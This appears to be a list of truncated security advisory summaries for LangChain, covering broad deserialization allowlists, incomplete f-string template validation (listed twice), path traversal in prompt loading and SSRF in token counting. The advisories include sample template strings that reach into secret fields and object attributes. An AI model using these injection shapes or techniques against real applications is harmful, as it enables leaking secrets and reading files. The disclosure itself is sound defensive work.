LangChain contains older runtime code paths that deserialize run inputs, run outputs, or other application-controlled payloads using overly broad object allowlists. These paths may call load() with allowed_objects="all". This does not enable arbitrary Python object deserialization, but it does allow any trusted LangChain-serializable object to be revived, which is broader than these runtime paths require. As a result, attacker-supplied LangChain serialized constructor dictionaries may cause trusted runtime paths to instantiate …
LangChain's f-string prompt-template validation was incomplete in two respects. First, some prompt template classes accepted f-string templates and formatted them without enforcing the same attribute-access validation as PromptTemplate. In particular, DictPromptTemplate and ImagePromptTemplate could accept templates containing attribute access or indexing expressions and subsequently evaluate those expressions during formatting. Examples of the affected shape include: "{message.additional_kwargs[secret]}" "https://example.com/{image.class.name}.png" Second, f-string validation based on parsed top-level field names did not reject nested …
LangChain's f-string prompt-template validation was incomplete in two respects. First, some prompt template classes accepted f-string templates and formatted them without enforcing the same attribute-access validation as PromptTemplate. In particular, DictPromptTemplate and ImagePromptTemplate could accept templates containing attribute access or indexing expressions and subsequently evaluate those expressions during formatting. Examples of the affected shape include: "{message.additional_kwargs[secret]}" "https://example.com/{image.class.name}.png" Second, f-string validation based on parsed top-level field names did not reject nested …
Multiple functions in langchain_core.prompts.loading read files from paths embedded in deserialized config dicts without validating against directory traversal or absolute path injection. When an application passes user-influenced prompt configurations to load_prompt() or load_prompt_from_config(), an attacker can read arbitrary files on the host filesystem, constrained only by file-extension checks (.txt for templates, .json/.yaml for examples). Note: The affected functions (load_prompt, load_prompt_from_config, and the .save() method on prompt classes) are undocumented legacy …
The ChatOpenAI.get_num_tokens_from_messages() method fetches arbitrary image_url values without validation when computing token counts for vision-enabled models. This allows attackers to trigger Server-Side Request Forgery (SSRF) attacks by providing malicious image URLs in user input.